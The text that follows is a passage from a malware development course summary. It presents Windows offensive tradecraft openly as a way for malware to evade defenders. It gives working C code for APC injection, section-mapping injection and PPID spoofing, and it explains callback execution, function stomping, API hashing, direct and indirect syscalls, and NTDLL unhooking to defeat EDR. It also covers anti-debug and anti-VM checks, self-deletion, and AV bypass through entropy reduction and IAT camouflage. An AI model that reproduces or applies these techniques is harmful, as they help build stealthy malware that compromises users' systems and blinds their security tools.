Remote Thread Hijacking applies the same principle but to threads of a different process. Additional step: use CreateToolhelp32Snapshot to enumerate threads of the target process, then select an appropriate thread to hijack. This technique completely avoids calling CreateRemoteThread — an API commonly hooked by EDR.
APC Injection
Asynchronous Procedure Call (APC) is a Windows mechanism that allows code execution in the context of a specific thread. APC Injection leverages this mechanism to insert a payload into a target thread's APC queue. When the thread enters an alertable state (calling SleepEx, WaitForSingleObjectEx, etc.), the APC will be executed.
Standard APC Injection
// APC Injection into a remote process
BOOL ApcInjection(IN DWORD dwPid, IN PBYTE pShellcode, IN SIZE_T sSize) {
// 1. Open target process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
// 2. Allocate and write shellcode
PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pAddress, pShellcode, sSize, NULL);
// 3. Find alertable threads
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 te32 = { .dwSize = sizeof(THREADENTRY32) };
if (Thread32First(hSnapshot, &te32)) {
do {
if (te32.th32OwnerProcessID == dwPid) {
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE,
te32.th32ThreadID);
// 4. Queue APC to the thread
QueueUserAPC((PAPCFUNC)pAddress, hThread, 0);
CloseHandle(hThread);
}
} while (Thread32Next(hSnapshot, &te32));
}
CloseHandle(hSnapshot);
CloseHandle(hProcess);
return TRUE;
}
Early Bird APC Injection
Early Bird is a variant of APC Injection that executes before the main thread of the process begins running. The process: create a process in a suspended state using CreateProcess with the CREATE_SUSPENDED flag, queue an APC to the main thread, then resume the process. The thread will execute the APC before running the process's main code. This technique is particularly effective because it avoids race conditions — the thread is guaranteed to be in an alertable state when resumed.
Callback Code Execution
Callback Code Execution takes advantage of Windows APIs that accept function pointer callbacks as parameters. Instead of creating a new thread or injecting into another process, malware passes the shellcode address as a callback function to legitimate APIs. When the API is called, it executes the callback — which is the shellcode. This technique is extremely effective because it uses legitimate APIs, does not create new threads, and is difficult to detect through conventional monitoring methods.
// Callback Code Execution - using EnumWindows
// Pass shellcode address as the callback
BOOL result = EnumWindows((WNDENUMPROC)pShellcodeAddress, 0);
// Other callback APIs that can be used:
// EnumChildWindows, EnumDesktopWindows, EnumSystemLocalesA
// EnumSystemLocalesW, EnumTimeFormatsA, EnumDesktopWindows
// CreateTimerQueueTimer, EnumUILanguages
// CertEnumSystemStore, EnumSystemGeoID
Callback execution does not require CreateThread or CreateRemoteThread, does not modify thread context, and uses completely legitimate Windows APIs. This is one of the stealthiest techniques for executing shellcode.
Mapping Injection
Mapping Injection uses Windows Section objects (shared memory) to inject shellcode into a target process without needing VirtualAllocEx/WriteProcessMemory — two APIs commonly hooked by EDR. This technique uses NtCreateSection, NtMapViewOfSection, and NtUnmapViewOfSection to create a shared memory section, write the payload to a local view, then map it into the target process.
// Local Mapping Injection
BOOL MappingInjection(IN PBYTE pShellcode, IN SIZE_T sSize) {
HANDLE hSection = NULL;
PVOID pLocalView = NULL;
PVOID pRemoteView = NULL;
SIZE_T sViewSize = sSize;
// 1. Create section object
NTSTATUS status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
&(LARGE_INTEGER){ .QuadPart = sSize },
PAGE_EXECUTE_READWRITE,
SEC_COMMIT, NULL);
// 2. Map section into local process (R/W)
NtMapViewOfSection(hSection, GetCurrentProcess(), &pLocalView, 0, 0,
NULL, &sViewSize, ViewUnmap, 0, PAGE_READWRITE);
// 3. Write shellcode to local view
memcpy(pLocalView, pShellcode, sSize);
// 4. Map section into local process with RX (executable)
NtMapViewOfSection(hSection, GetCurrentProcess(), &pRemoteView, 0, 0,
NULL, &sViewSize, ViewUnmap, 0, PAGE_EXECUTE_READ);
// 5. Execute shellcode
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)pRemoteView,
NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
// 6. Cleanup
NtUnmapViewOfSection(GetCurrentProcess(), pLocalView);
NtUnmapViewOfSection(GetCurrentProcess(), pRemoteView);
NtClose(hSection);
CloseHandle(hThread);
return TRUE;
}
Remote Mapping Injection
The remote variant maps the section object into a target process instead of the local process. This completely bypasses VirtualAllocEx and WriteProcessMemory by using NtMapViewOfSection with the target process handle. This technique is considered one of the most sophisticated injection methods available today.
Function Stomping Injection
Function Stomping (also known as Function Hooking Overwrite) is a technique that overwrites the content of a legitimate function in a loaded DLL with shellcode. Instead of allocating new memory, it uses existing memory that is already marked as executable. This technique helps bypass security checks that monitor the allocation of new executable memory regions.
The process: load a DLL into the process using LoadLibraryA, find the target function address using GetProcAddress, change the memory protection to RW using VirtualProtect, overwrite the function with shellcode, restore the protection to RX, and execute via a callback or by directly calling the overwritten function.
Choose functions that are rarely called during normal operation — for example, functions in rarely-used DLLs. If you choose a frequently-called function (like CreateFileW), the shellcode will execute multiple times unintentionally or cause crashes.
Spoofing
PPID Spoofing (Parent Process ID)
PPID Spoofing changes the parent process of a newly created process, making it appear as if it was launched by a legitimate process (e.g., explorer.exe) rather than the malware. This helps bypass security rules based on parent-child process relationships. The technique uses PROC_THREAD_ATTRIBUTE_LIST and UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify the parent process.
// PPID Spoofing - create process with a fake parent process
BOOL CreateSpoofedProcess(IN DWORD dwParentPid, IN LPCWSTR lpCmdLine) {
// Open handle to the parent process to spoof
HANDLE hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwParentPid);
// Initialize STARTUPINFOEX
STARTUPINFOEXW si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
// Allocate PROC_THREAD_ATTRIBUTE_LIST
SIZE_T sAttrListSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &sAttrListSize);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
HeapAlloc(GetProcessHeap(), 0, sAttrListSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sAttrListSize);
// Set parent process attribute
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
&hParentProcess, sizeof(HANDLE), NULL, NULL);
// Create process with spoofed PPID
CreateProcessW(NULL, (LPWSTR)lpCmdLine, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
&si.StartupInfo, &pi);
// Cleanup
DeleteProcThreadAttributeList(si.lpAttributeList);
CloseHandle(hParentProcess);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return TRUE;
}
Process Argument Spoofing
Process Argument Spoofing creates a process with fake command-line arguments (appearing legitimate, such as notepad.exe C:\Windows\Temp\readme.txt), but then overwrites them with the real arguments in memory before the process actually executes. This technique deceives monitoring tools that only read the initial command line.
String Hashing
String Hashing replaces API name strings with their hash values, helping avoid detection through IAT checking and string scanning. Instead of calling GetProcAddress(hModule, "VirtualAlloc"), you calculate the hash of "VirtualAlloc" and find the function with a matching hash in the DLL's Export Table. Common hashing algorithms:
#include <windows.h>

// DJB2 hash algorithm
DWORD HashStringDjb2A(IN PCHAR String) {
    ULONG Hash = 5381;
    while (*String) {
        Hash = ((Hash << 5) + Hash) + *String; // Hash * 33 + c
        String++;
    }
    return Hash;
}
// Jenkins one-at-a-time 32-bit hash
DWORD HashStringJenkinsOneAtATime32BitA(IN PCHAR String) {
    DWORD Hash = 0;
    while (*String) {
        Hash += *String;
        Hash += Hash << 10;
        Hash ^= Hash >> 6;
        String++;
    }
    Hash += Hash << 3;
    Hash ^= Hash >> 11;
    Hash += Hash << 15;
    return Hash;
}
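Hash implementations are easy to get subtly wrong. For example, when CHAR is signed, a byte above 0x7F is added as a negative number. A few known values make a useful regression check. The sketch below restates both functions portably with uint32_t and treats each character as an unsigned byte; Djb2 and JenkinsOaat are hypothetical names. For the single character "a", DJB2 gives 5381 × 33 + 97 = 177670, and Jenkins one-at-a-time gives 0xCA2E9442.

```c
#include <assert.h>
#include <stdint.h>

/* DJB2: h = h * 33 + c, starting from 5381. */
uint32_t Djb2(const char* s) {
    uint32_t h = 5381;
    for (; *s; s++) {
        h = ((h << 5) + h) + (unsigned char)*s;
    }
    return h;
}

/* Jenkins one-at-a-time, 32-bit. */
uint32_t JenkinsOaat(const char* s) {
    uint32_t h = 0;
    for (; *s; s++) {
        h += (unsigned char)*s;
        h += h << 10;
        h ^= h >> 6;
    }
    /* Final avalanche */
    h += h << 3;
    h ^= h >> 11;
    h += h << 15;
    return h;
}
```

For plain ASCII input these produce the same values as the Windows versions above; they differ only for bytes above 0x7F, where the signed CHAR versions add a negative value.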
IAT Hiding & Obfuscation
The IAT (Import Address Table) contains a list of all functions that a program uses — information that is extremely valuable to AV. IAT Hiding is a technique to remove or conceal this information, preventing AV from knowing which APIs the program uses simply by checking the IAT.
Method 1: Dynamic Resolution
Instead of importing APIs at compile time (which leaves traces in the IAT), use GetModuleHandle + GetProcAddress at runtime to obtain function addresses. However, GetModuleHandle and GetProcAddress are themselves imported, so they still appear in the IAT.
Method 2: Custom GetProcAddress & GetModuleHandle
Implement custom versions of GetModuleHandle and GetProcAddress that read process and PE structures directly. The custom GetModuleHandle walks the loaded-module list (PEB → Ldr → InMemoryOrderModuleList) to find a DLL's base address; the custom GetProcAddress parses that DLL's PE headers and Export Table to find functions by name or hash.
API Hashing
Combines String Hashing with IAT Hiding: instead of using string names, use the hash of API names to find functions. This technique completely removes API name strings from the binary, making static analysis much more difficult.
Compile-Time API Hashing
Takes API Hashing a step further: the API names can stay readable in the source code, but their hashes are computed at compile time using constexpr or macros, so no strings end up in the binary. At runtime, only the pre-calculated hash values are used to resolve APIs.
API Hooking
API Hooking is a technique that intercepts and modifies the behavior of API functions by modifying code at the function's address. It is both a tool used by EDR for monitoring and a technique that malware can utilize. The main hooking methods include:
Detours
Microsoft Detours is the most popular hooking library. It overwrites the first instructions of the target function (at least 5 bytes) with a jump to the hook (detour) function, and preserves the overwritten instructions in a trampoline that jumps back into the rest of the target. When the target function is called, execution is redirected to the hook function, which can inspect or modify parameters before calling the original code through the trampoline, or skip it entirely.
MinHook Library
MinHook is a lightweight hooking library that supports hooking multiple functions simultaneously. It provides a simple API: MH_Initialize, MH_CreateHook, MH_EnableHook.
API Hooking Using Windows APIs
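Hooking can also be done with plain Windows APIs and no external libraries. The technique: change the memory protection of the target function, write a jump instruction over its first bytes, then restore the original protection. Related uses include keyloggers (commonly built with SetWindowsHookEx, which installs a Windows message hook rather than patching function code) and shellcode injection monitors.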
Syscalls
Syscalls provide a mechanism to call directly into kernel mode, bypassing the WinAPI and ntdll.dll layers. EDRs commonly hook functions in ntdll.dll to monitor API calls — by calling syscalls directly, malware completely bypasses userland hooks. However, syscall numbers change between Windows versions, so techniques are needed to determine the correct syscall number at runtime.
SysWhispers
SysWhispers is a tool that automatically generates syscall stubs for NTAPI functions. It generates assembly code containing the syscall number and stub code for each function. SysWhispers2 improves upon this by automatically resolving syscall numbers at runtime through a sorting algorithm. SysWhispers3 adds support for indirect syscalls and other advanced techniques.
// SysWhispers2 - auto-resolve syscall number at runtime
// Generated stub for NtAllocateVirtualMemory
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect);
// Implementation auto-finds syscall number
// by sorting functions in ntdll export table
Hell's Gate
Hell's Gate is a technique for resolving syscall numbers (SSNs) at runtime by reading the code of ntdll.dll directly in memory. If an EDR has hooked a function in ntdll, its first bytes are replaced with a jump instruction. Hell's Gate therefore checks the first bytes of each function: if they match the unhooked stub mov r10, rcx; mov eax, SSN (bytes 4C 8B D1 B8), the function has not been hooked and the SSN can be read from the immediate operand that follows B8; if they start with a jump instruction, the function has been hooked.
// Hell's Gate - Resolve syscall number from ntdll
// Check if function is hooked
// mov r10, rcx -> 4C 8B D1
// mov eax, SSN -> B8 XX XX 00 00
// If first byte is 0x4C -> not hooked, extract SSN
// If first byte is 0xE9 or 0xFF -> hooked
typedef struct _SYSCALL_ENTRY {
DWORD dwSSN;
PVOID pSyscallAddr;
} SYSCALL_ENTRY;
// pSyscallAddr: address of an unhooked "syscall; ret" sequence in ntdll,
// which the stub jumps to when performing indirect syscalls
Anti-Analysis
Anti-analysis techniques help malware remain undetected for longer, giving the developer additional time to modify the code and making it harder to detect. The goal is not to make analysis impossible, which cannot be achieved, but to make it more time-consuming.
IsDebuggerPresent
The simplest function to detect a debugger. However, directly calling the WinAPI's IsDebuggerPresent is suspicious and can be bypassed using ScyllaHide. A better approach: check PEB.BeingDebugged directly.
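// Custom IsDebuggerPresent - check PEB directly
#include <windows.h>
#include <winternl.h> // PEB definition (contains BeingDebugged)
#include <intrin.h>   // __readgsqword / __readfsdword
BOOL IsDebuggerPresent2() {
#ifdef _WIN64
PPEB pPeb = (PPEB)__readgsqword(0x60); // x64: PEB pointer at gs:[0x60]
#elif defined(_WIN32)
PPEB pPeb = (PPEB)__readfsdword(0x30); // x86: PEB pointer at fs:[0x30]
#endif
return pPeb->BeingDebugged;
}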
NtQueryInformationProcess
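Use NtQueryInformationProcess with the ProcessDebugPort information class (7) to check for a debugger: if the returned debug port is non-zero, the process is being debugged. This is harder to bypass than the PEB check because the value comes from the kernel rather than from a user-writable PEB field, although anti-anti-debug tools such as ScyllaHide can still hook the call.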
Hardware Breakpoints Detection
Detect hardware breakpoints by examining the thread context — specifically the debug registers DR0-DR3 (breakpoint addresses) and DR7 (breakpoint controls). If any of DR0-DR3 are non-zero, a debugger has placed hardware breakpoints.
Timing Checks
Use GetTickCount64 or QueryPerformanceCounter to measure time between two points in the code. If the time is abnormally long, a debugger may be single-stepping through the code. Simple but effective technique.
Self-Deletion
Delete the malware's own executable file after it has started running, removing the on-disk artifact. A plain DeleteFile call fails while the executable is running, so the approaches described are MoveFileEx with the MOVEFILE_DELAY_UNTIL_REBOOT flag, which marks the file for deletion on the next restart, or opening the file with FILE_FLAG_DELETE_ON_CLOSE.
Anti-Virtual Environments
Anti-VM techniques help malware detect whether it is running in a virtual machine or sandbox. If a virtual environment is detected, the malware will execute benign code or stop entirely. This is an effective way to avoid analysis by automated sandbox systems (Cuckoo, Any.run, CrowdStrike Sandbox).
Hardware Specs Check
Check hardware specifications: less than 4GB of RAM, fewer than 2 CPU cores, or a disk smaller than 60GB are each common indicators of a VM. Use GlobalMemoryStatusEx, GetSystemInfo, and GetDiskFreeSpaceExW to read these values.
Machine Resolution Check
VMs often use default resolutions (800x600, 1024x768). Check using GetSystemMetrics with SM_CXSCREEN and SM_CYSCREEN.
Filename Check
Some sandboxes rename samples according to specific patterns, such as the file's hash or names containing "sample" or "malware". Check the current executable's filename for such patterns.
Running Processes Check
Check for VM-specific processes: vmtoolsd.exe, vmwaretray.exe, vboxservice.exe, xenservice.exe.
User Interaction Check
Sandboxes typically lack user interaction. Check click counts, idle time, and cursor position. If there is no interaction for an extended period, the malware may be running in a sandbox.
Multiple Delay Execution Techniques
Sandboxes often have timeouts to avoid infinite execution. Use various delay techniques to outlast them: WaitForSingleObject, MsgWaitForMultipleObjectsEx, NtWaitForSingleObject, NtDelayExecution. Each technique has unique characteristics and is harder to patch than a simple Sleep call.
API Hammering
API Hammering consumes CPU time by repeatedly calling harmless APIs that serve no real purpose. Sandboxes often accelerate time (for example, by fast-forwarding Sleep), but API Hammering forces the sandbox to actually execute each call, which stretches the analysis and can exceed the sandbox's timeout.
EDR Bypass & NTDLL Unhooking
EDRs (Endpoint Detection and Response) hook functions in ntdll.dll to monitor API calls. NTDLL Unhooking is a technique that restores the original code of ntdll.dll, removing EDR hooks. There are several unhooking methods:
NTDLL Unhooking from Disk
Read a clean copy of ntdll.dll from disk (C:\Windows\System32\ntdll.dll), compare it with the loaded version in memory, and overwrite the text section of the in-memory version with the clean copy from disk. Use CreateFileW + ReadFile or memory mapping to read the file.
NTDLL Unhooking from KnownDlls Directory
KnownDlls is a special directory in Windows that contains section objects for system DLLs, including ntdll.dll. These section objects contain clean (unhooked) copies of the DLLs. Use NtOpenSection + NtMapViewOfSection to map the clean copy, then copy the text section to the loaded ntdll.dll.
NTDLL Unhooking from Suspended Process
Create a new process in a suspended state (e.g., notepad.exe). Its ntdll.dll is still clean because EDRs install their hooks only after the process has initialized. Map ntdll.dll from the suspended process, copy its text section, and unmap it.
NTDLL Unhooking from Web Server
Download a clean copy of ntdll.dll from a remote server, compare and overwrite the text section. This method bypasses all local hooking mechanisms but requires a network connection.
Indirect Syscalls — HellsHall
Direct Syscalls bypass userland hooks but leave a trace: the return address on the stack points to a memory region not belonging to ntdll.dll, which EDR can detect through return address checking. Indirect Syscalls solve this problem by executing the syscall instruction from within ntdll.dll (at a legitimate address), making the return address appear normal.
HellsHall combines Hell's Gate (to resolve the SSN) and Halo's Gate (to find unhooked syscall instructions in ntdll) to perform indirect syscalls. The process: find the SSN using the Hell's Gate method, locate the address of a syscall; ret instruction sequence within ntdll, and transfer execution to that address. The return address on the stack then belongs to ntdll, which defeats return address checking.
Direct Syscall: The syscall instruction resides in malware code. The return address on the stack points to the malware's memory region → easily detected by return address validation.
Indirect Syscall: The syscall instruction resides in ntdll.dll. The return address on the stack points to an ntdll region → appears like a legitimate function call, harder to detect.
Bypassing AVs
Effectively bypassing AV requires combining multiple techniques discussed in the previous sections. No single technique is sufficient to bypass all security solutions — a multi-layered (reverse defense-in-depth) approach is needed.
Binary Entropy Reduction
Encrypted payloads have high entropy — a suspicious indicator for AV. Entropy reduction techniques: insert legitimate strings, pad with the same byte, remove the CRT library (reduces size), use the EntropyReducer tool. The goal: reduce entropy to a level close to that of a normal binary.
CRT Library Removal
Removing the C Runtime Library significantly reduces binary size and entropy. Replace CRT functions with custom implementations: replace memcpy with a loop, replace printf with WriteConsoleA, etc. Set a custom entry point symbol to avoid needing CRT startup code.
IAT Camouflage
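IAT Camouflage adds harmless, unused imports so that the IAT resembles that of an ordinary application and disguises the real one. Because the compiler's dead-code elimination may remove these fake imports, use #pragma comment(linker, "/include:...") or volatile references to force the compiler to retain them.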
Block DLL Policy
Block DLL Policy prevents DLLs that are not signed by Microsoft, which includes many EDR DLLs, from being loaded into newly created processes. Use PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON flag. The policy can be applied to both local and remote processes.
References
This research document was compiled from the Malware Development course by qa210, which covers 33 chapters from fundamentals to advanced topics. The content spans the entire MDLC, from basic Windows Architecture, PE Format, and DLL knowledge to advanced techniques like Indirect Syscalls, EDR Bypass, and NTDLL Unhooking.
Additional Topics Covered in the Full Course
| Topic | Description |
|---|---|
| Malware Signing | Digitally sign malware to bypass SmartScreen and trust verification |
| Payload Execution Control | Use Semaphore, Mutex, and Events to control payload execution flow |
| PE Header Analysis | Deep analysis of PE headers: RVAs, Export Table, IAT, Undocumented structures |
| Brute Force Decryption | Encrypt keys using custom functions, brute force to decrypt at runtime |
| NtCreateUserProcess | Create processes using NTAPI instead of CreateProcess, combined with PPID spoofing and block DLL |
| API Hammering | Consume CPU time to outlast sandbox timeouts |
Malware Development course by qa210 — complete material with 33 chapters including theory, code demos, and practice exercises. This document summarizes the key concepts; reading the original material is recommended for a deeper understanding of each technique and hands-on practice with full code examples.